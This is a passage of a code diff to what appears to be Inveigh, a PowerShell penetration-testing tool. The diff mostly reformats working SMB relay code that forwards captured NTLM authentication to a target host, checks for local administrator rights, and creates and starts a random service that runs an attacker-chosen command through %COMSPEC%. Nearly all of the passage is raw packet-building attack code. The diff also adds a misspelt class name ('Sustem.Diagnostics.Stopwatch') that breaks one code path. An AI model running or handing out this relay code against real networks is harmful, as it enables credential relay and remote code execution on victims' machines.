+                                       0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,0x00,
+                                       0x00,0x00 +
+                                       $SMB_blob_length +
+                                       0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 +
+                                       $SMB_byte_count +
+                                       0xa1,0x82 +
+                                       $SMB_length_1 +
+                                       0x30,0x82 +
+                                       $SMB_length_2 +
+                                       0xa2,0x82 +
+                                       $SMB_length_3 +
+                                       0x04,0x82 +
+                                       $SMB_NTLMSSP_length +
+                                       $HTTP_request_bytes +
+                                       0x55,0x6e,0x69,0x78,0x00,0x53,0x61,0x6d,0x62,0x61,0x00
 
-            $SMB_relay_response_stream.write($SMB_relay_response_send, 0, $SMB_relay_response_send.length)
+            $SMB_relay_response_stream.Write($SMB_relay_response_send,0,$SMB_relay_response_send.Length)
         	$SMB_relay_response_stream.Flush()
             
             if($SMBRelayNetworkTimeout)
             {
-                $SMB_relay_response_timeout = new-timespan -Seconds $SMBRelayNetworkTimeout
-                $SMB_relay_response_stopwatch = [diagnostics.stopwatch]::StartNew()
+                $SMB_relay_response_timeout = New-Timespan -Seconds $SMBRelayNetworkTimeout
+                $SMB_relay_response_stopwatch = [Sustem.Diagnostics.Stopwatch]::StartNew()
                     
                 while(!$SMB_relay_response_stream.DataAvailable)
                 {
-                    if($SMB_relay_response_stopwatch.elapsed -ge $SMB_relay_response_timeout)
+
+                    if($SMB_relay_response_stopwatch.Elapsed -ge $SMB_relay_response_timeout)
                     {
-                        $inveigh.console_queue.add("SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")
-                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")])
+                        $inveigh.console_queue.Add("SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")])
                         $inveigh.SMB_relay_active_step = 0
                         $SMB_relay_socket.Close()
                         break :SMB_relay_response_loop
                     }
+
                 }
+
             }
 
-            $SMB_relay_response_stream.Read($SMB_relay_response_bytes, 0, $SMB_relay_response_bytes.length)
-            
+            $SMB_relay_response_stream.Read($SMB_relay_response_bytes,0,$SMB_relay_response_bytes.Length)
             $inveigh.SMB_relay_active_step = 2
-            
             $j++
-        
         }
+
         return $SMB_relay_response_bytes
     }
+
 }
 
 # SMB Relay Execute ScriptBlock - executes command within authenticated SMB session
 $SMB_relay_execute_scriptblock =
 {
-    Function SMBRelayExecute
+    function SMBRelayExecute
     {
         param ($SMB_relay_socket,$SMB_user_ID)
     
@@ -653,19 +700,19 @@ $SMB_relay_execute_scriptblock =
 
         $SMB_relay_failed = $false
         $SMB_relay_execute_bytes = New-Object System.Byte[] 1024
-        $SMB_service_random = [String]::Join("00-", (1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)}))
+        $SMB_service_random = [String]::Join("00-",(1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)}))
         $SMB_service = $SMB_service_random -replace "-00",""
-        $SMB_service = $SMB_service.Substring(0,$SMB_service.Length-1)
-        $SMB_service = $SMB_service.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+        $SMB_service = $SMB_service.Substring(0,$SMB_service.Length - 1)
+        $SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
         $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length)
         $SMB_service_random += '00-00-00'
-        [Byte[]]$SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+        [Byte[]] $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
         $SMB_referent_ID_bytes = [String](1..4 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
-        $SMB_referent_ID_bytes = $SMB_referent_ID_bytes.Split(" ") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+        $SMB_referent_ID_bytes = $SMB_referent_ID_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
         $SMBRelayCommand = "%COMSPEC% /C `"" + $SMBRelayCommand + "`""
-        [System.Text.Encoding]::UTF8.GetBytes($SMBRelayCommand) | ForEach-Object{ $SMB_relay_command += "{0:X2}-00-" -f $_ }
+        [System.Text.Encoding]::UTF8.GetBytes($SMBRelayCommand) | ForEach-Object{$SMB_relay_command += "{0:X2}-00-" -f $_}
 
-        if([bool]($SMBRelayCommand.length%2))
+        if([Bool]($SMBRelayCommand.Length % 2))
         {
             $SMB_relay_command += '00-00'
         }
@@ -674,182 +721,221 @@ $SMB_relay_execute_scriptblock =
             $SMB_relay_command += '00-00-00-00'
         }    
         
-        [Byte[]]$SMB_relay_command_bytes = $SMB_relay_command.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-        $SMB_service_data_length_bytes = [BitConverter]::GetBytes($SMB_relay_command_bytes.length + $SMB_service_bytes.length + 237)
+        [Byte[]] $SMB_relay_command_bytes = $SMB_relay_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_service_data_length_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length + $SMB_service_bytes.Length + 237)
         $SMB_service_data_length_bytes = $SMB_service_data_length_bytes[2..0]
-        $SMB_service_byte_count_bytes = [BitConverter]::GetBytes($SMB_relay_command_bytes.length + $SMB_service_bytes.length + 237 - 63)
+        $SMB_service_byte_count_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length + $SMB_service_bytes.Length + 174)
         $SMB_service_byte_count_bytes = $SMB_service_byte_count_bytes[0..1]   
-        $SMB_relay_command_length_bytes = [BitConverter]::GetBytes($SMB_relay_command_bytes.length / 2)
-
+        $SMB_relay_command_length_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length / 2)
         $k = 0
 
         :SMB_relay_execute_loop while ($k -lt 12)
         {
+
             switch ($k)
             {
             
-                0 {
-                    [Byte[]]$SMB_relay_execute_send = (0x00,0x00,0x00,0x45,0xff,0x53,0x4d,0x42,0x75,0x00,0x00,0x00,0x00,0x18,0x01,0x48)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff)`
-                        + $inveigh.process_ID_bytes`
-                        + $SMB_user_ID`
-                        + (0x00,0x00,0x04,0xff,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x1a,0x00,0x00,0x5c,0x5c,0x31,0x30,0x2e,0x31)`
-                        + (0x30,0x2e,0x32,0x2e,0x31,0x30,0x32,0x5c,0x49,0x50,0x43,0x24,0x00,0x3f,0x3f,0x3f,0x3f,0x3f,0x00)
+                0
+                {
+                    $SMB_relay_execute_send = 0x00,0x00,0x00,0x45,0xff,0x53,0x4d,0x42,0x75,0x00,0x00,0x00,0x00,
+                                              0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                              0x00,0x00,0xff,0xff +
+                                              $inveigh.process_ID_bytes +
+                                              $SMB_user_ID +
+                                              0x00,0x00,0x04,0xff,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x1a,0x00,
+                                              0x00,0x5c,0x5c,0x31,0x30,0x2e,0x31,0x30,0x2e,0x32,0x2e,0x31,0x30,
+                                              0x32,0x5c,0x49,0x50,0x43,0x24,0x00,0x3f,0x3f,0x3f,0x3f,0x3f,0x00
                 }
                   
-                1 {
-                    [Byte[]]$SMB_relay_execute_send = (0x00,0x00,0x00,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x00,0x00,0x00,0x00,0x18,0x02,0x28)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
-                        + $inveigh.process_ID_bytes`
-                        + $SMB_user_ID`
-                        + (0x03,0x00,0x18,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x16,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)`
-                        + (0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x01,0x00,0x00,0x00)`
-                        + (0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x08,0x00,0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00)
+                1
+                {
+                    $SMB_relay_execute_send = 0x00,0x00,0x00,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x00,0x00,0x00,0x00,
+                                              0x18,0x02,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                              0x00,0x00,0x00,0x08 +
+                                              $inveigh.process_ID_bytes +
+                                              $SMB_user_ID +
+                                              0x03,0x00,0x18,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x16,0x00,0x00,
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x01,
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x08,
+                                              0x00,0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00
                 }
                 
-                2 {
-                    [Byte[]]$SMB_relay_execute_send = (0x00,0x00,0x00,0x87,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
-                        + $inveigh.process_ID_bytes`
-                        + $SMB_user_ID`
-                        + (0x04,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,0xff,0xff,0xff,0xff,0x08,0x00,0x48,0x00)`
-                        + (0x00,0x00,0x48,0x00,0x3f,0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x16,0xd0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00)`
-                        + (0x01,0x00,0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,0x00,0x10,0x03,0x02,0x00,0x00)`
-                        + (0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00)
+                2
+                {
+                    $SMB_relay_execute_send = 0x00,0x00,0x00,0x87,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
+                                              0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                              0x00,0x00,0x00,0x08 +
+                                              $inveigh.process_ID_bytes +
+                                              $SMB_user_ID +
+                                              0x04,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,
+                                              0xff,0xff,0xff,0xff,0x08,0x00,0x48,0x00,0x00,0x00,0x48,0x00,0x3f,
+                                              0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x05,0x00,0x0b,0x03,0x10,0x00,
+                                              0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x16,0xd0,
+                                              0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
+                                              0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,
+                                              0x00,0x10,0x03,0x02,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,
+                                              0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60,0x02,0x00,0x00,
+                                              0x00
                         
-                        $SMB_multiplex_id = (0x05)
+                    $SMB_multiplex_id = 0x05
                 }
                
-                3 { 
-                    [Byte[]]$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
+                3
+                { 
+                    $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
                 }
                 
-                4 {
-                    [Byte[]] $SMB_relay_execute_send = (0x00,0x00,0x00,0x9b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
-                        + $inveigh.process_ID_bytes`
-                        + $SMB_user_ID`
-                        + (0x06,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,0xff,0xff,0xff,0xff,0x08,0x00,0x50)`
-                        + (0x00,0x00,0x00,0x5c,0x00,0x3f,0x00,0x00,0x00,0x00,0x00,0x5c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,0x00)`
-                        + (0x00,0x5c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x00,0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x03)`
-                        + (0x00,0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00)`
-                        + $SMB_service_bytes`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x0f,0x00)
+                4
+                {
+                    $SMB_relay_execute_send = 0x00,0x00,0x00,0x9b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
+                                              0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                              0x00,0x00,0x00,0x08 +
+                                              $inveigh.process_ID_bytes +
+                                              $SMB_user_ID +
+                                              0x06,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,
+                                              0xff,0xff,0xff,0xff,0x08,0x00,0x50,0x00,0x00,0x00,0x5c,0x00,0x3f,
+                                              0x00,0x00,0x00,0x00,0x00,0x5c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
+                                              0x00,0x00,0x5c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x00,
+                                              0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x03,0x00,0x15,0x00,0x00,0x00,
+                                              0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
+                                              $SMB_service_bytes +
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x0f,0x00
                         
-                        $SMB_multiplex_id = (0x07)
+                    $SMB_multiplex_id = 0x07
                 }
                 
-                5 {  
-                    [Byte[]]$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
+                5
+                {  
+                    $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
                 }
                 
-                6 {
-                    [Byte[]]$SMB_relay_execute_send = [ARRAY](0x00)`
-                        + $SMB_service_data_length_bytes`
-                        + (0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
-                        + $inveigh.process_ID_bytes`
-                        + $SMB_user_ID`
-                        + (0x08,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0xff,0xff,0xff,0xff,0x08,0x00)`
-                        + $SMB_service_byte_count_bytes`
-                        + (0x00,0x00)`
-                        + $SMB_service_byte_count_bytes`
-                        + (0x3f,0x00,0x00,0x00,0x00,0x00)`
-                        + $SMB_service_byte_count_bytes`
-                        + (0x05,0x00,0x00,0x03,0x10)`
-                        + (0x00,0x00,0x00)`
-                        + $SMB_service_byte_count_bytes`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c,0x00)`
-                        + $SMB_context_handler`
-                        + (0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00)`
-                        + $SMB_service_bytes`
-                        + (0x00,0x00)`
-                        + $SMB_referent_ID_bytes`
-                        + (0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00)`
-                        + $SMB_service_bytes`
-                        + (0x00,0x00,0xff,0x01,0x0f,0x00,0x10,0x01,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)`
-                        + $SMB_relay_command_length_bytes`
-                        + (0x00,0x00,0x00,0x00)`
-                        + $SMB_relay_command_length_bytes`
-                        + $SMB_relay_command_bytes`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)
+                6
+                {
+                    $SMB_relay_execute_send = [Array] 0x00 +
+                                              $SMB_service_data_length_bytes +
+                                              0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28,0x00,
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08 +
+                                              $inveigh.process_ID_bytes +
+                                              $SMB_user_ID +
+                                              0x08,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,
+                                              0xff,0xff,0xff,0xff,0x08,0x00 +
+                                              $SMB_service_byte_count_bytes +
+                                              0x00,0x00 +
+                                              $SMB_service_byte_count_bytes +
+                                              0x3f,0x00,0x00,0x00,0x00,0x00 +
+                                              $SMB_service_byte_count_bytes +
+                                              0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00 +
+                                              $SMB_service_byte_count_bytes +
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c,
+                                              0x00 +
+                                              $SMB_context_handler +
+                                              0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
+                                              $SMB_service_bytes +
+                                              0x00,0x00 +
+                                              $SMB_referent_ID_bytes +
+                                              0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
+                                              $SMB_service_bytes +
+                                              0x00,0x00,0xff,0x01,0x0f,0x00,0x10,0x01,0x00,0x00,0x03,0x00,0x00,
+                                              0x00,0x00,0x00,0x00,0x00 +
+                                              $SMB_relay_command_length_bytes +
+                                              0x00,0x00,0x00,0x00 +
+                                              $SMB_relay_command_length_bytes +
+                                              $SMB_relay_command_bytes +
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                              0x00,0x00
                         
-                        $SMB_multiplex_id = (0x09)
+                    $SMB_multiplex_id = 0x09
                 }
 
-                7 {
-                    [Byte[]]$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
+                7
+                {
+                    $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
                 }
 
                 
-                8 {
-                    [Byte[]]$SMB_relay_execute_send = (0x00,0x00,0x00,0x73,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
-                        + $inveigh.process_ID_bytes`
-                        + $SMB_user_ID`
-                        + (0x0a,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0xff,0xff,0xff,0xff,0x08,0x00,0x34)`
-                        + (0x00,0x00,0x00,0x34,0x00,0x3f,0x00,0x00,0x00,0x00,0x00,0x34,0x00,0x05,0x00,0x00,0x03,0x10,0x00,0x00)`
-                        + (0x00,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x13,0x00)`
-                        + $SMB_context_handler`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)
+                8
+                {
+                    $SMB_relay_execute_send = 0x00,0x00,0x00,0x73,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
+                                              0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                              0x00,0x00,0x00,0x08 +
+                                              $inveigh.process_ID_bytes +
+                                              $SMB_user_ID +
+                                              0x0a,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,
+                                              0xff,0xff,0xff,0xff,0x08,0x00,0x34,0x00,0x00,0x00,0x34,0x00,0x3f,
+                                              0x00,0x00,0x00,0x00,0x00,0x34,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
+                                              0x00,0x00,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00,
+                                              0x00,0x00,0x00,0x13,0x00 +
+                                              $SMB_context_handler +
+                                              0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
                 }
                 
-                9 {
-                    [Byte[]]$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
+                9
+                {
+                    $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
                 }
                 
-                10 { 
-                    [Byte[]]$SMB_relay_execute_send = (0x00,0x00,0x00,0x6b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
-                        + $inveigh.process_ID_bytes`
-                        + $SMB_user_ID`
-                        + (0x0b,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x0b,0x01,0x00,0x00,0xff,0xff,0xff,0xff,0x08,0x00,0x2c)`
-                        + (0x00,0x00,0x00,0x2c,0x00,0x3f,0x00,0x00,0x00,0x00,0x00,0x2c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,0x00)`
-                        + (0x00,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x02,0x00)`
-                        + $SMB_context_handler
+                10
+                { 
+                     $SMB_relay_execute_send = 0x00,0x00,0x00,0x6b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
+                                               0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                               0x00,0x00,0x00,0x08 +
+                                               $inveigh.process_ID_bytes +
+                                               $SMB_user_ID +
+                                               0x0b,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x0b,0x01,0x00,0x00,
+                                               0xff,0xff,0xff,0xff,0x08,0x00,0x2c,0x00,0x00,0x00,0x2c,0x00,0x3f,
+                                               0x00,0x00,0x00,0x00,0x00,0x2c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
+                                               0x00,0x00,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00,
+                                               0x00,0x00,0x00,0x02,0x00 +
+                                               $SMB_context_handler
                 }
-                11 {
-                    [Byte[]]$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
+
+                11
+                {
+                     $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
                 }
+
             }
             
-            $SMB_relay_execute_stream.write($SMB_relay_execute_send, 0, $SMB_relay_execute_send.length)
+            $SMB_relay_execute_stream.Write($SMB_relay_execute_send,0,$SMB_relay_execute_send.Length)
             $SMB_relay_execute_stream.Flush()
             
             if($SMBRelayNetworkTimeout)
             {
-                $SMB_relay_execute_timeout = new-timespan -Seconds $SMBRelayNetworkTimeout
-                $SMB_relay_execute_stopwatch = [diagnostics.stopwatch]::StartNew()
+                $SMB_relay_execute_timeout = New-Timespan -Seconds $SMBRelayNetworkTimeout
+                $SMB_relay_execute_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
                 
                 while(!$SMB_relay_execute_stream.DataAvailable)
                 {
-                    if($SMB_relay_execute_stopwatch.elapsed -ge $SMB_relay_execute_timeout)
+
+                    if($SMB_relay_execute_stopwatch.Elapsed -ge $SMB_relay_execute_timeout)
                     {
-                        $inveigh.console_queue.add("SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")
-                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")])
+                        $inveigh.console_queue.Add("SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")])
                         $SMB_relay_failed = $true
                         break SMB_relay_execute_loop
                     }
+                
                 }
+            
             }
             
             if ($k -eq 5) 
             {
-                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes, 0, $SMB_relay_execute_bytes.length)
+                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)
                 $SMB_context_handler = $SMB_relay_execute_bytes[88..107]
 
-                if(([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '00-00-00-00') -and ([System.BitConverter]::ToString($SMB_context_handler) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00'))
+                if([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_context_handler) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
                 {
-                    $inveigh.console_queue.add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $SMBRelayTarget")
-                    $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $SMBRelayTarget")])
+                    $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $SMBRelayTarget")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $SMBRelayTarget")])
                 }
                 elseif([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '05-00-00-00')
                 {
-                    $inveigh.console_queue.add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $SMBRelayTarget")
-                    $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $SMBRelayTarget")])
-                    $inveigh.SMBRelay_failed_list += "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget"
+                    $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $SMBRelayTarget")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $SMBRelayTarget")])
+                    $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget")
                     $SMB_relay_failed = $true
                 }
                 else
@@ -860,20 +946,27 @@ $SMB_relay_execute_scriptblock =
             }
             elseif (($k -eq 7) -or ($k -eq 9) -or ($k -eq 11))
             {
-                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes, 0, $SMB_relay_execute_bytes.length)
+                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)
 
                 switch($k)
                 {
-                    7 {
+
+                    7
+                    {
                         $SMB_context_handler = $SMB_relay_execute_bytes[92..111]
                         $SMB_relay_execute_error_message = "Service creation fault context mismatch"
                     }
-                    11 {
+
+                    11
+                    {
                         $SMB_relay_execute_error_message = "Service start fault context mismatch"
                     }
-                    13 {
+
+                    13
+                    {
                         $SMB_relay_execute_error_message = "Service deletion fault context mismatch"
                     }
+
                 }
                 
                 if([System.BitConverter]::ToString($SMB_context_handler[0..3]) -ne '00-00-00-00')
@@ -883,50 +976,54 @@ $SMB_relay_execute_scriptblock =
 
                 if([System.BitConverter]::ToString($SMB_relay_execute_bytes[88..91]) -eq '1a-00-00-1c')
                 {
-                    $inveigh.console_queue.add("$SMB_relay_execute_error_message service on $SMBRelayTarget")
-                    $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $SMB_relay_execute_error on $SMBRelayTarget")])
+                    $inveigh.console_queue.Add("$SMB_relay_execute_error_message service on $SMBRelayTarget")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $SMB_relay_execute_error on $SMBRelayTarget")])
                     $SMB_relay_failed = $true
                 }
+
             }        
             else
             {
-                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes, 0, $SMB_relay_execute_bytes.length)    
